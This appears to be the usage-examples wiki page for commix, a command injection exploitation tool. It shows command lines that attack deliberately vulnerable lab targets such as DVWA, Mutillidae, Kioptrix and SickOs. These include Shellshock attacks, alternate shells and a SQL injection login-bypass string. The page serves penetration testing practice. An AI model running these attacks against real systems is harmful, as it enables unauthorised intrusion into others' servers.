Usage Examples

Anastasios Stasinopoulos edited this page Jun 3, 2022 · 43 revisions

  1. Low level OS command injection:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=low; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

  2. Medium level OS command injection:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

  3. High level OS command injection:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=high; PHPSESSID=nq30op434117mo7o2oe5bl7is4" --technique=f --web-root="/var/www/html/"


2. Exploiting php-Charts 1.0:

Exploitation using a custom injection payload prefix and suffix string:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"


3. Exploiting OWASP Mutillidae:

Exploitation using extra HTTP headers and an HTTP proxy:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"


4. Exploiting Persistence:

Exploitation using an alternative (Python) shell:

python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"


python commix.py --url="http://127.0.0.1:9090/app/ping" --data "address=127.0.0.1" --cookie="connect.sid=s%3AIdvte5ieuGQC5C8jt5aSyUTSF8xZtls8.3fwCVsyypx%2BLGXtiF1JTBrqbmjp%2B29vwKoL0uxcHub8"


python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"


7. Exploiting Kioptrix: 2014 (#5):

Exploitation using a custom User-Agent and a specified injection technique:

python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --web-root="/"


python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock


python commix.py --url="http://127.0.0.1/scenarios/cookie/cookie(classic).php" --cookie="addr=127.0.0.1" -p addr


python commix.py --url="http://127.0.0.1/scenarios/user-agent/ua(blind).php" -p user-agent


11. Exploiting commix-testbed (referer):

python commix.py --url="http://127.0.0.1/scenarios/referer/referer(classic).php" -p referer


12. Exploiting Flick 2:

Exploitation using custom HTTP headers and base64 encoding:

python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64


python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'


14. Exploiting SickOs 1.1:

Exploitation using the shellshock module and an HTTP proxy:

python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"


  1. OS Command Injection #1:

python commix.py --url="http://127.0.0.1:5000/graphql" --data='{"query":"mutation{importPaste(host:\"commixproject.com\" , port:80 , path:\"/\" , scheme:\"http\"){result}}"}'

  2. OS Command Injection #2:

python commix.py --url="http://127.0.0.1:5000/graphql" --data='{"query":"query {systemDiagnostics(username:\"admin\" , password:\"admin123\" , cmd:\"test\")}"}' -p cmd


python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>127.0.0.1</addr><count>4</count></ping>'


  1. Use HTTP2WebSocket to run a listener on port 3333 that connects to the dvws.local:8080 WebSocket app on every HTTP request:

python3 HTTP2WebSocket.py -l 3333 -t ws://dvws.local:8080

  2. Exploit the OS command execution:

python commix.py -u "http://127.0.0.1:3333/command-execution" --data="addr=127.0.0.1"